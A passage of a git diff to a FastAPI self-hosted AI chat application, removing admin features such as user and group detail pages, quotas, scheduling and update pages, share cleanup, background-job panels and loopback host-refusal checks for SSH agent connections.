values.update(SAMPLE_AGENT)
|
||||
# A real one out of the table, not invented prose: this bullet *is* the
|
||||
# mode guidance, so a made-up sentence here would preview wording that
|
||||
# no request ever carries.
|
||||
values["agent_mode"] = policy.MODE_GUIDANCE.get(mode, "") or policy.MODE_GUIDANCE[
|
||||
policy.MODE_EDIT
|
||||
]
|
||||
if situation == SITUATION_TASK:
|
||||
values.update(SAMPLE_SCHEDULE)
|
||||
if situation == SITUATION_HELPER:
|
||||
values["subagent"] = "yes"
|
||||
return values
|
||||
|
||||
|
||||
@@ -174,27 +109,16 @@ async def prompts_page(request: Request, db: Db, user: AdminUser, saved: bool =
|
||||
"variables": prompts_service.VARIABLES,
|
||||
# The legend shows what each name resolves to right now, with every
|
||||
# family on -- a legend nobody can check is just a list of words.
|
||||
# Every situation at once, unlike the preview: a chat is either a
|
||||
# scheduled task or a helper and never both, but a legend is a
|
||||
# reference rather than a rendering, and a name shown as empty
|
||||
# because of the situation it was built in reads as a name that
|
||||
# resolves to nothing.
|
||||
"resolved": {
|
||||
**_variables(
|
||||
"resolved": _variables(
|
||||
db,
|
||||
user,
|
||||
families=families,
|
||||
model_name=models[0].label if models else "",
|
||||
bases="Contracts, Recipes",
|
||||
documents=SAMPLE_DOCUMENTS,
|
||||
situation=SITUATION_TASK,
|
||||
),
|
||||
"subagent": "yes",
|
||||
},
|
||||
"models": models,
|
||||
"families": families,
|
||||
"situations": SITUATIONS,
|
||||
"modes": policy.MODE_LABELS,
|
||||
"registry": sorted(
|
||||
tools_service.registry(db).values(), key=lambda t: (t.family, t.name)
|
||||
),
|
||||
@@ -249,8 +173,6 @@ async def preview(request: Request, db: Db, user: AdminUser):
|
||||
model_name = str(form.get("preview_model") or "")
|
||||
bases = str(form.get("preview_bases") or "").strip()
|
||||
documents = str(form.get("preview_documents") or "").strip()
|
||||
situation = str(form.get("preview_situation") or "")
|
||||
mode = str(form.get("preview_mode") or "")
|
||||
|
||||
variables = _variables(
|
||||
db,
|
||||
@@ -259,8 +181,6 @@ async def preview(request: Request, db: Db, user: AdminUser):
|
||||
model_name=model_name,
|
||||
bases=bases,
|
||||
documents=documents,
|
||||
situation=situation,
|
||||
mode=mode,
|
||||
)
|
||||
body = harness_service.compose_from(
|
||||
db,
|
||||
|
||||
@@ -1,76 +0,0 @@
|
||||
"""Scheduling administration: whether work may run on its own, and how much.
|
||||
|
||||
Everything here is clamped again in `settings_store.schedules` on the way out.
|
||||
That is not belt and braces for its own sake: a value stored by an earlier
|
||||
release, or edited into the database by hand, has to be survivable too, and the
|
||||
same argument `agents` and `images` already make. What this page adds is telling
|
||||
somebody *why* a number matters at the moment they change it.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Form, Request, Response, status
|
||||
from fastapi.responses import RedirectResponse
|
||||
from sqlalchemy import func, select
|
||||
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.db.models import Schedule
|
||||
from lembas.services import settings_store
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/admin/schedules", tags=["admin-schedules"])
|
||||
|
||||
|
||||
@router.get("")
|
||||
async def schedules_page(request: Request, db: Db, user: AdminUser, saved: bool = False):
|
||||
total = int(db.scalar(select(func.count()).select_from(Schedule)) or 0)
|
||||
active = int(
|
||||
db.scalar(
|
||||
select(func.count()).select_from(Schedule).where(Schedule.enabled.is_(True))
|
||||
)
|
||||
or 0
|
||||
)
|
||||
return render(
|
||||
request,
|
||||
"admin/schedules.html",
|
||||
{
|
||||
"values": settings_store.schedules(db),
|
||||
# Shown because turning the switch off does not delete anything, and
|
||||
# an administrator who has just done so should be able to see what
|
||||
# has stopped rather than infer it.
|
||||
"total": total,
|
||||
"active": active,
|
||||
"saved": saved,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.post("")
|
||||
async def save_schedules(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
enabled: bool = Form(False),
|
||||
tick_seconds: int = Form(30),
|
||||
max_per_user: int = Form(20),
|
||||
max_concurrent: int = Form(3),
|
||||
min_interval_seconds: int = Form(60),
|
||||
max_queued: int = Form(3),
|
||||
) -> Response:
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
"enabled": enabled,
|
||||
"tick_seconds": tick_seconds,
|
||||
"max_per_user": max_per_user,
|
||||
"max_concurrent": max_concurrent,
|
||||
"min_interval_seconds": min_interval_seconds,
|
||||
"max_queued": max_queued,
|
||||
},
|
||||
key=settings_store.SCHEDULES,
|
||||
)
|
||||
log.info("scheduling %s by %s", "enabled" if enabled else "disabled", user.email)
|
||||
return RedirectResponse("/admin/schedules?saved=1", status_code=status.HTTP_303_SEE_OTHER)
|
||||
@@ -57,7 +57,6 @@ async def save_search(
|
||||
firecrawl_api_key: str = Form(""),
|
||||
timeout: float = Form(20.0),
|
||||
allow_private_fetch: bool = Form(False),
|
||||
fetch_enabled: bool = Form(False),
|
||||
) -> Response:
|
||||
current = settings_store.search(db)
|
||||
known = {p.key for p in search_service.PROVIDERS}
|
||||
@@ -80,7 +79,6 @@ async def save_search(
|
||||
),
|
||||
"timeout": min(max(timeout, 5.0), 120.0),
|
||||
"allow_private_fetch": allow_private_fetch,
|
||||
"fetch_enabled": fetch_enabled,
|
||||
},
|
||||
key=settings_store.SEARCH,
|
||||
)
|
||||
|
||||
@@ -1,80 +0,0 @@
|
||||
"""What is running here, and getting to what is not.
|
||||
|
||||
Read `services/updates.py` first — the reason the button writes a file rather
|
||||
than doing the work is there, and it is the whole design.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Request, Response, status
|
||||
from fastapi.responses import RedirectResponse
|
||||
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.services import updates as updates_service
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/admin/updates", tags=["admin-updates"])
|
||||
|
||||
|
||||
def _page(request: Request, state, saved: str = "") -> Response:
|
||||
return render(
|
||||
request,
|
||||
"admin/updates.html",
|
||||
{
|
||||
"state": state,
|
||||
"command": updates_service.manual_command(),
|
||||
"saved": saved,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("")
|
||||
async def updates_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
|
||||
"""No network on a page load.
|
||||
|
||||
`read(fetch=False)` compares against whatever the last fetch left behind, so
|
||||
opening this is a few git reads off the local disk. A page that reached the
|
||||
remote every time it was rendered would be one somebody stops opening.
|
||||
"""
|
||||
return _page(request, updates_service.read(), saved)
|
||||
|
||||
|
||||
@router.post("/check")
|
||||
async def check(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""Ask the remote what is there. The one place this touches the network."""
|
||||
state = updates_service.read(fetch=True)
|
||||
log.info("%s checked for updates", user.email)
|
||||
return _page(request, state)
|
||||
|
||||
|
||||
@router.post("/apply")
|
||||
async def apply(db: Db, user: AdminUser) -> Response:
|
||||
"""Write the request the helper is watching for.
|
||||
|
||||
Refused when the helper is not installed rather than written and left to sit
|
||||
there: a file nothing is watching is a button that reports success and does
|
||||
nothing, which is the failure this codebase keeps cataloguing.
|
||||
"""
|
||||
if not updates_service.helper_installed():
|
||||
return RedirectResponse(
|
||||
"/admin/updates?saved=The+update+helper+is+not+installed+on+this+host.",
|
||||
status_code=status.HTTP_303_SEE_OTHER,
|
||||
)
|
||||
problem = updates_service.request_update(user.email)
|
||||
message = problem or "Update requested. The service will restart in a moment."
|
||||
return RedirectResponse(
|
||||
f"/admin/updates?saved={message.replace(' ', '+')}",
|
||||
status_code=status.HTTP_303_SEE_OTHER,
|
||||
)
|
||||
|
||||
|
||||
@router.post("/cancel")
|
||||
async def cancel(db: Db, user: AdminUser) -> Response:
|
||||
updates_service.clear_request()
|
||||
return RedirectResponse(
|
||||
"/admin/updates?saved=Request+withdrawn.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
+12
-145
@@ -10,23 +10,11 @@ from sqlalchemy import func, or_, select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.db.models import (
|
||||
PRINCIPAL_GROUP,
|
||||
PRINCIPAL_USER,
|
||||
ROLE_ADMIN,
|
||||
ROLE_PENDING,
|
||||
ROLE_USER,
|
||||
Chat,
|
||||
Group,
|
||||
Model,
|
||||
User,
|
||||
)
|
||||
from lembas.db.models import ROLE_ADMIN, ROLE_PENDING, ROLE_USER, Group, Model, User
|
||||
from lembas.security import permissions
|
||||
from lembas.security.passwords import hash_password, validate_password
|
||||
from lembas.security.sessions import revoke_all_for_user
|
||||
from lembas.services import chat as chat_service
|
||||
from lembas.services import settings_store, sharing
|
||||
from lembas.services import usage as usage_service
|
||||
from lembas.services import settings_store
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
@@ -66,71 +54,22 @@ def _would_orphan_the_instance(db: DBSession, user: User) -> bool:
|
||||
|
||||
|
||||
# --- Users -------------------------------------------------------------------
|
||||
# List plus detail, which is the shape this codebase already mandates for admin
|
||||
# lists and the one `/admin/models` follows. The single page it replaces
|
||||
# rendered a full form per account *and* a membership grid, and edited that
|
||||
# membership from the opposite side to `/admin/groups` -- so a full-form POST
|
||||
# from either overwrote what the other had just shown.
|
||||
#
|
||||
# Membership is now edited from **one** side, the group's. A user's page links
|
||||
# to their groups and does not offer to change them, because two controls
|
||||
# writing one value is how each becomes the answer to "why did my change not
|
||||
# stick?".
|
||||
PAGE_SIZE = 25
|
||||
|
||||
|
||||
@router.get("/users")
|
||||
async def users_page(
|
||||
request: Request, db: Db, user: AdminUser, q: str = "", saved: str = "", page: int = 1
|
||||
):
|
||||
async def users_page(request: Request, db: Db, user: AdminUser, q: str = "", saved: str = ""):
|
||||
query = select(User).order_by(User.created_at)
|
||||
if q.strip():
|
||||
pattern = f"%{q.strip()}%"
|
||||
query = query.where(or_(User.name.ilike(pattern), User.email.ilike(pattern)))
|
||||
|
||||
total = db.scalar(select(func.count()).select_from(query.subquery())) or 0
|
||||
pages = max(1, (total + PAGE_SIZE - 1) // PAGE_SIZE)
|
||||
page = min(max(1, page), pages)
|
||||
rows = list(db.scalars(query.offset((page - 1) * PAGE_SIZE).limit(PAGE_SIZE)))
|
||||
|
||||
return render(
|
||||
request,
|
||||
"admin/users.html",
|
||||
{
|
||||
"users": rows,
|
||||
"usage": {row.id: usage_service.summary(db, row) for row in rows},
|
||||
"users": list(db.scalars(query)),
|
||||
"groups": list(db.scalars(select(Group).order_by(Group.name))),
|
||||
"roles": ROLES,
|
||||
"q": q,
|
||||
"saved": saved,
|
||||
"pager": {"page": page, "pages": pages, "total": total},
|
||||
"admin_count": _admin_count(db),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/users/{user_id}")
|
||||
async def user_detail(request: Request, db: Db, user: AdminUser, user_id: str, saved: str = ""):
|
||||
"""One account, and the answer to "what can this person actually do?".
|
||||
|
||||
That answer is `permissions.explain`, which is `resolve`'s working shown
|
||||
rather than thrown away. Read-only on purpose: every one of those switches
|
||||
is set somewhere else -- the baseline, or a named group -- and a control here
|
||||
would be a third place to change one thing.
|
||||
"""
|
||||
target = _user(db, user_id)
|
||||
return render(
|
||||
request,
|
||||
"admin/user_detail.html",
|
||||
{
|
||||
"target": target,
|
||||
"roles": ROLES,
|
||||
"explained": permissions.explain(db, target),
|
||||
"permission_groups": permissions.permission_groups(),
|
||||
"limits": permissions.limits_for(db, target),
|
||||
"limit_defs": permissions.LIMIT_DEFS,
|
||||
"usage": usage_service.summary(db, target),
|
||||
"models": permissions.models_visible_to(db, target),
|
||||
"saved": saved,
|
||||
"admin_count": _admin_count(db),
|
||||
},
|
||||
)
|
||||
@@ -175,13 +114,8 @@ async def update_user(
|
||||
name: str = Form(...),
|
||||
role: str = Form(ROLE_USER),
|
||||
active: bool = Form(False),
|
||||
group_ids: list[str] = Form(default=[]),
|
||||
) -> Response:
|
||||
"""Name, role and whether the account is active. **Not membership.**
|
||||
|
||||
That moved to the group's page. It used to be here as well, and a full-form
|
||||
POST from either side overwrote whatever the other had -- two controls, one
|
||||
value, and no answer to which one wins.
|
||||
"""
|
||||
target = _user(db, user_id)
|
||||
|
||||
losing_admin = target.role == ROLE_ADMIN and (role != ROLE_ADMIN or not active)
|
||||
@@ -194,6 +128,7 @@ async def update_user(
|
||||
target.name = name.strip()[:120] or target.name
|
||||
target.role = role if role in ROLES else target.role
|
||||
target.active = active
|
||||
target.groups = list(db.scalars(select(Group).where(Group.id.in_(group_ids or []))))
|
||||
|
||||
# A deactivated or demoted user must lose their live sessions immediately,
|
||||
# otherwise the change only takes effect when their cookie happens to expire.
|
||||
@@ -202,9 +137,7 @@ async def update_user(
|
||||
|
||||
db.commit()
|
||||
log.info("%s updated account %s (role=%s active=%s)", user.email, target.email, role, active)
|
||||
return RedirectResponse(
|
||||
f"/admin/users/{target.id}?saved=Saved+{target.email}.", status_code=303
|
||||
)
|
||||
return RedirectResponse(f"/admin/users?saved=Saved+{target.email}.", status_code=303)
|
||||
|
||||
|
||||
@router.post("/users/{user_id}/password")
|
||||
@@ -213,7 +146,7 @@ async def reset_password(
|
||||
) -> Response:
|
||||
target = _user(db, user_id)
|
||||
if (problem := validate_password(password)) is not None:
|
||||
return RedirectResponse(f"/admin/users/{user_id}?saved={problem}", status_code=303)
|
||||
return RedirectResponse(f"/admin/users?saved={problem}", status_code=303)
|
||||
|
||||
target.password_hash = hash_password(password)
|
||||
db.commit()
|
||||
@@ -222,7 +155,7 @@ async def reset_password(
|
||||
revoke_all_for_user(db, target)
|
||||
log.info("%s reset the password for %s", user.email, target.email)
|
||||
return RedirectResponse(
|
||||
f"/admin/users/{target.id}?saved=Password+reset.+Sessions+revoked.",
|
||||
f"/admin/users?saved=Password+reset+for+{target.email}.+Sessions+revoked.",
|
||||
status_code=303,
|
||||
)
|
||||
|
||||
@@ -242,20 +175,6 @@ async def delete_user(db: Db, user: AdminUser, user_id: str) -> Response:
|
||||
|
||||
email = target.email
|
||||
# Chats and folders cascade; that is the point of deleting an account.
|
||||
#
|
||||
# Shares do not, and never did. `Share.principal_id` and
|
||||
# `Share.resource_id` both point at one of several tables depending on a
|
||||
# sibling column, which SQLite cannot express as a foreign key -- so a
|
||||
# deleted account left behind every grant *to* it and every grant *of* its
|
||||
# own work. Both halves, and both before the delete, while the rows are
|
||||
# still there to be found.
|
||||
sharing.forget_owner(db, target.id)
|
||||
sharing.forget_principal(db, PRINCIPAL_USER, target.id)
|
||||
# And the same shape a third time: the chats cascade, their attachment rows
|
||||
# cascade, and every file those rows named stays on disk with nothing left
|
||||
# that will ever look at it. Before the delete, while the rows still say
|
||||
# which files they are.
|
||||
chat_service.delete_chats(db, list(db.scalars(select(Chat).where(Chat.user_id == target.id))))
|
||||
db.delete(target)
|
||||
db.commit()
|
||||
log.info("%s deleted account %s", user.email, email)
|
||||
@@ -263,42 +182,17 @@ async def delete_user(db: Db, user: AdminUser, user_id: str) -> Response:
|
||||
|
||||
|
||||
# --- Groups ------------------------------------------------------------------
|
||||
# The same list-plus-detail shape. The old page rendered every group's full
|
||||
# permission grid, every member and every model on one screen, which is fine for
|
||||
# two groups and unreadable at ten.
|
||||
@router.get("/groups")
|
||||
async def groups_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
|
||||
groups = list(db.scalars(select(Group).order_by(Group.name)))
|
||||
return render(
|
||||
request,
|
||||
"admin/groups.html",
|
||||
{
|
||||
"groups": groups,
|
||||
"granted": {
|
||||
group.id: sum(1 for on in (group.permissions_json or {}).values() if on)
|
||||
for group in groups
|
||||
},
|
||||
"permission_groups": permissions.permission_groups(),
|
||||
"baseline": permissions.baseline_permissions(db),
|
||||
"saved": saved,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/groups/{group_id}")
|
||||
async def group_detail(request: Request, db: Db, user: AdminUser, group_id: str, saved: str = ""):
|
||||
group = _group(db, group_id)
|
||||
return render(
|
||||
request,
|
||||
"admin/group_detail.html",
|
||||
{
|
||||
"group": group,
|
||||
"groups": list(db.scalars(select(Group).order_by(Group.name))),
|
||||
"users": list(db.scalars(select(User).order_by(User.name))),
|
||||
"models": list(db.scalars(select(Model).order_by(Model.position, Model.model_id))),
|
||||
"permission_groups": permissions.permission_groups(),
|
||||
"baseline": permissions.baseline_permissions(db),
|
||||
"limit_defs": permissions.LIMIT_DEFS,
|
||||
"limits": group.limits_json or {},
|
||||
"saved": saved,
|
||||
},
|
||||
)
|
||||
@@ -322,7 +216,6 @@ async def create_group(db: Db, user: AdminUser, name: str = Form(...)) -> Respon
|
||||
|
||||
@router.post("/groups/{group_id}")
|
||||
async def update_group(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
group_id: str,
|
||||
@@ -333,7 +226,6 @@ async def update_group(
|
||||
model_ids: list[str] = Form(default=[]),
|
||||
) -> Response:
|
||||
group = _group(db, group_id)
|
||||
form = await request.form()
|
||||
|
||||
group.name = name.strip()[:120] or group.name
|
||||
group.description = description.strip()[:1000]
|
||||
@@ -343,26 +235,9 @@ async def update_group(
|
||||
group.users = list(db.scalars(select(User).where(User.id.in_(user_ids or []))))
|
||||
group.models = list(db.scalars(select(Model).where(Model.id.in_(model_ids or []))))
|
||||
|
||||
# Quotas. Only what was submitted and could be read as a number is stored, so
|
||||
# a blank box means "this group has no opinion" and contributes nothing to
|
||||
# the resolution -- which is what `limits_for` needs in order to tell it
|
||||
# apart from a deliberate zero, and zero here means *no limit*.
|
||||
wanted: dict[str, int] = {}
|
||||
for key in permissions.LIMIT_KEYS:
|
||||
raw = str(form.get(f"limit_{key}") or "").strip()
|
||||
if not raw:
|
||||
continue
|
||||
try:
|
||||
wanted[key] = max(0, int(raw))
|
||||
except ValueError:
|
||||
continue
|
||||
group.limits_json = wanted
|
||||
|
||||
db.commit()
|
||||
log.info("%s updated group %s", user.email, group.name)
|
||||
return RedirectResponse(
|
||||
f"/admin/groups/{group.id}?saved=Saved+{group.name}.", status_code=303
|
||||
)
|
||||
return RedirectResponse(f"/admin/groups?saved=Saved+{group.name}.", status_code=303)
|
||||
|
||||
|
||||
@router.post("/groups/{group_id}/delete")
|
||||
@@ -370,16 +245,8 @@ async def delete_group(db: Db, user: AdminUser, group_id: str) -> Response:
|
||||
group = _group(db, group_id)
|
||||
name = group.name
|
||||
# Members and model links go with it; the users themselves are untouched.
|
||||
#
|
||||
# Every share naming this group goes too. Nothing cascades -- see
|
||||
# `sharing.forget_principal` -- so a deleted group left its grants behind,
|
||||
# and a group id is a random hex string that nothing reissues today and
|
||||
# nothing promises not to reissue tomorrow.
|
||||
dropped = sharing.forget_principal(db, PRINCIPAL_GROUP, group.id)
|
||||
db.delete(group)
|
||||
db.commit()
|
||||
if dropped:
|
||||
log.info("dropped %d share(s) naming group %s", dropped, name)
|
||||
log.info("%s deleted group %s", user.email, name)
|
||||
return RedirectResponse(f"/admin/groups?saved=Deleted+{name}.", status_code=303)
|
||||
|
||||
|
||||
+4
-184
@@ -24,10 +24,7 @@ from lembas.api.deps import Db, RequiredUser, require_permission
|
||||
from lembas.api.pages import sidebar_context
|
||||
from lembas.db.models import AUTH_METHODS, AUTH_PASSWORD, SshProfile
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.agent import draft as draft_service
|
||||
from lembas.services.agent import hosts
|
||||
from lembas.services.agent import index as index_service
|
||||
from lembas.services.agent import jobs as jobs_service
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
from lembas.services.agent import terminal as terminal_service
|
||||
from lembas.services.agent.base import ExecError
|
||||
@@ -120,9 +117,6 @@ def _detail(
|
||||
else "",
|
||||
"has_key": bool(profile.private_key_encrypted),
|
||||
"problem": ssh_service.available(),
|
||||
# Empty on the new-connection page, where there is no host yet to
|
||||
# ask about -- the answer arrives when it is submitted.
|
||||
"refused": hosts.refusal_for(db, profile) if profile.host else "",
|
||||
},
|
||||
)
|
||||
|
||||
@@ -134,11 +128,7 @@ async def agents_page(request: Request, db: Db, user: RequiredUser, saved: str =
|
||||
"agents/index.html",
|
||||
{
|
||||
**sidebar_context(db, user),
|
||||
"profiles": (owned := _owned(db, user.id)),
|
||||
# Keyed by id rather than resolved in the template, because the
|
||||
# template has no session and this is a question about instance
|
||||
# settings, not about the row.
|
||||
"refusals": {p.id: hosts.refusal_for(db, p) for p in owned},
|
||||
"profiles": _owned(db, user.id),
|
||||
"saved": saved,
|
||||
"problem": ssh_service.available(),
|
||||
"enabled": bool(settings_store.agents(db).get("enabled")),
|
||||
@@ -187,18 +177,6 @@ def _problem(db: Db, profile: SshProfile, owner_id: str, *, existing_id: str = "
|
||||
if not profile.username:
|
||||
return "A connection needs a username to log in as."
|
||||
|
||||
# Saving is one of the two moments a DNS lookup is affordable, so this is
|
||||
# where a *name* pointing at loopback is settled and written to the row for
|
||||
# every later request to read for free. See services/agent/hosts.py.
|
||||
#
|
||||
# Not the last word -- `session.resolve` refuses one that was saved before an
|
||||
# administrator moved the switch, and has to, because a row can predate a
|
||||
# setting. This is here so the refusal arrives while somebody is looking at
|
||||
# the form that caused it rather than at an agent chat with no tools.
|
||||
resolved = hosts.restamp(profile)
|
||||
if refused := hosts.refusal(db, profile.host, profile.port, resolved=resolved):
|
||||
return refused
|
||||
|
||||
clash = db.scalar(
|
||||
select(SshProfile).where(
|
||||
SshProfile.owner_id == owner_id, SshProfile.name == profile.name
|
||||
@@ -219,12 +197,7 @@ async def profile_page(
|
||||
|
||||
@router.get("/api/agents/{profile_id}/browse")
|
||||
async def browse_profile(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
profile_id: str,
|
||||
path: str = "",
|
||||
pick: str = "dir",
|
||||
request: Request, db: Db, user: RequiredUser, profile_id: str, path: str = ""
|
||||
):
|
||||
"""One directory on the far side, as a fragment the picker swaps in.
|
||||
|
||||
@@ -238,17 +211,13 @@ async def browse_profile(
|
||||
it holds for the same reason -- somebody who owns the credential could list
|
||||
the directory with an ssh client -- but it does mean Manual mode's promise
|
||||
that everything is shown to you first now has a second exception. Both are
|
||||
written down in the working notes.
|
||||
written down in CLAUDE.md.
|
||||
"""
|
||||
profile = _profile(db, user, profile_id)
|
||||
entries: list = []
|
||||
error = ""
|
||||
|
||||
if refused := hosts.refusal_for(db, profile):
|
||||
# First, because this one opens a connection and the others only explain
|
||||
# why one would fail.
|
||||
error = refused
|
||||
elif hint := ssh_service.available():
|
||||
if hint := ssh_service.available():
|
||||
error = hint
|
||||
elif not profile.host_key:
|
||||
# connect_kwargs would raise the same thing, but a picker that opens on
|
||||
@@ -271,143 +240,6 @@ async def browse_profile(
|
||||
"parent": _parent_of(here),
|
||||
"entries": entries,
|
||||
"error": error,
|
||||
# Whether a file is a choice or only something to look at. The
|
||||
# directory picker wants the folder you are standing in; Canvas
|
||||
# wants the file you click. One listing, because a second copy is a
|
||||
# second place for the path arithmetic to be got subtly differently.
|
||||
"pick": "file" if pick == "file" else "dir",
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
# --- Background jobs -----------------------------------------------------------
|
||||
# A job runs detached on the far side for as long as it takes -- a build, an
|
||||
# install, a test suite -- and until now the only way to see one was to ask the
|
||||
# model to call `job_list`. Something that outlives the reply that started it
|
||||
# needs a surface that outlives the reply too.
|
||||
#
|
||||
# Read-only listing and stopping sit **outside `agent/policy.py`**, which makes
|
||||
# this the fifth exception to "the modes govern the model, not the interface",
|
||||
# after the terminal panel, the directory browser, the project listing and
|
||||
# Canvas saving a file. The argument is the one those rest on: whoever owns the
|
||||
# credential could read the log with `cat` and stop the job with `kill`, and a
|
||||
# panel that asked permission to show what is already running would be a panel
|
||||
# nobody could use. `job_stop` as a *model* tool keeps its RISK_EXECUTE and its
|
||||
# approval card; nothing about what a model may do has changed.
|
||||
def _job_chat(db: Db, user: RequiredUser, chat_id: str):
|
||||
"""The chat, and the agent context its jobs belong to.
|
||||
|
||||
404 for a chat that is not this reader's, as everywhere else -- whether an
|
||||
id exists is not something to hand out. The agent context is what carries
|
||||
the connection, so a chat whose profile has been deleted or disabled has no
|
||||
jobs to show rather than an error to render.
|
||||
"""
|
||||
from lembas.db.models import Chat
|
||||
from lembas.services.agent import session as agent_session
|
||||
|
||||
chat = db.get(Chat, chat_id)
|
||||
if chat is None or chat.user_id != user.id:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
|
||||
return chat, agent_session.resolve(db, chat, user)
|
||||
|
||||
|
||||
@router.get("/api/agents/{profile_id}/draft")
|
||||
async def draft_target(db: Db, user: RequiredUser, profile_id: str, dir: str = ""):
|
||||
"""The id the panels should use for a chat that does not exist yet.
|
||||
|
||||
Hung off the profile rather than the chat for the reason `browse` is: the
|
||||
caller is the *new*-chat composer, where the connection and the directory
|
||||
are the things being chosen. Ownership of the profile is the whole
|
||||
authorisation, as everywhere else in this module.
|
||||
|
||||
Deterministic, so asking twice for the same target gives the same id and
|
||||
finds the shell already running there rather than opening a second one.
|
||||
"""
|
||||
profile = _profile(db, user, profile_id)
|
||||
# A draft is what the terminal and the canvas open against before a chat
|
||||
# exists, so refusing here is refusing the whole new-chat path. `resolve`
|
||||
# would refuse it anyway once a chat existed; this stops the panel opening
|
||||
# on a target it will not be allowed to use.
|
||||
if refused := hosts.refusal_for(db, profile):
|
||||
raise HTTPException(status.HTTP_403_FORBIDDEN, refused)
|
||||
draft = draft_service.remember(user.id, profile.id, dir or profile.default_dir or "")
|
||||
return {"id": draft.id, "dir": draft.project_dir}
|
||||
|
||||
|
||||
@router.get("/api/chats/{chat_id}/jobs")
|
||||
async def jobs_chip(request: Request, db: Db, user: RequiredUser, chat_id: str):
|
||||
"""How many jobs are running, as the chip in the composer row.
|
||||
|
||||
Always rendered, even at zero -- the chip is what carries `hx-trigger`, so a
|
||||
fragment that collapsed to nothing would stop polling and the first job
|
||||
started afterwards would never appear. The template renders an empty span in
|
||||
that case, so the row does not reflow as jobs come and go.
|
||||
"""
|
||||
chat, agent = _job_chat(db, user, chat_id)
|
||||
views = jobs_service.listing(db, chat_id) if agent is not None else []
|
||||
return render(
|
||||
request,
|
||||
"chat/_jobs_chip.html",
|
||||
{"chat": chat, "jobs": views, "running": sum(1 for view in views if view.running)},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/api/chats/{chat_id}/jobs/panel")
|
||||
async def jobs_panel(request: Request, db: Db, user: RequiredUser, chat_id: str, job: str = ""):
|
||||
"""The list, and one job's output when a row is expanded.
|
||||
|
||||
The log is fetched only for the named job. Reading every job's tail on every
|
||||
poll would be one SSH connection per job per five seconds, for output nobody
|
||||
is looking at.
|
||||
"""
|
||||
chat, agent = _job_chat(db, user, chat_id)
|
||||
views = jobs_service.listing(db, chat_id) if agent is not None else []
|
||||
|
||||
body = ""
|
||||
error = ""
|
||||
if job and agent is not None:
|
||||
if not jobs_service.valid_id(job) or not any(view.id == job for view in views):
|
||||
# Namespaced by chat on the far side, and checked here as well: the
|
||||
# path is built from the chat id, but the route takes the job id
|
||||
# from the URL and must not read one that belongs elsewhere.
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such job.")
|
||||
try:
|
||||
reading = await jobs_service.read(agent, job)
|
||||
body = reading.body
|
||||
except ExecError as exc:
|
||||
error = exc.message
|
||||
|
||||
return render(
|
||||
request,
|
||||
"chat/_jobs_panel.html",
|
||||
{"chat": chat, "jobs": views, "open_job": job, "body": body, "error": error},
|
||||
)
|
||||
|
||||
|
||||
@router.post("/api/chats/{chat_id}/jobs/{job_id}/stop")
|
||||
async def stop_job(request: Request, db: Db, user: RequiredUser, chat_id: str, job_id: str):
|
||||
chat, agent = _job_chat(db, user, chat_id)
|
||||
views = jobs_service.listing(db, chat_id) if agent is not None else []
|
||||
if agent is None or not jobs_service.valid_id(job_id):
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such job.")
|
||||
if not any(view.id == job_id for view in views):
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such job.")
|
||||
|
||||
error = ""
|
||||
try:
|
||||
await jobs_service.stop(agent, job_id)
|
||||
except ExecError as exc:
|
||||
error = exc.message
|
||||
|
||||
return render(
|
||||
request,
|
||||
"chat/_jobs_panel.html",
|
||||
{
|
||||
"chat": chat,
|
||||
"jobs": jobs_service.listing(db, chat_id),
|
||||
"open_job": "",
|
||||
"body": "",
|
||||
"error": error,
|
||||
},
|
||||
)
|
||||
|
||||
@@ -436,18 +268,6 @@ async def check_profile(request: Request, db: Db, user: RequiredUser, profile_id
|
||||
"""
|
||||
profile = _profile(db, user, profile_id)
|
||||
|
||||
# Before anything is sent. Check is the one button here that opens a socket,
|
||||
# so a refused connection must not get one -- and the reason belongs in the
|
||||
# place somebody just pressed rather than in a log.
|
||||
#
|
||||
# The other moment a lookup is affordable, and the one that catches a name
|
||||
# whose DNS moved after it was saved: this button is how somebody finds out
|
||||
# a connection has stopped working, so it is the right place to find out why.
|
||||
hosts.restamp(profile)
|
||||
db.commit()
|
||||
if refused := hosts.refusal_for(db, profile):
|
||||
return render(request, "agents/_check.html", {"profile": profile, "error": refused})
|
||||
|
||||
try:
|
||||
line, fingerprint = await ssh_service.capture_host_key(
|
||||
profile.host, profile.port, timeout=profile.connect_timeout
|
||||
|
||||
@@ -1,65 +0,0 @@
|
||||
"""Serving what an administrator customised.
|
||||
|
||||
Both routes here are deliberately **unauthenticated**, and for the same reason
|
||||
the manifest and the offline page are: the sign-in page needs the logo before
|
||||
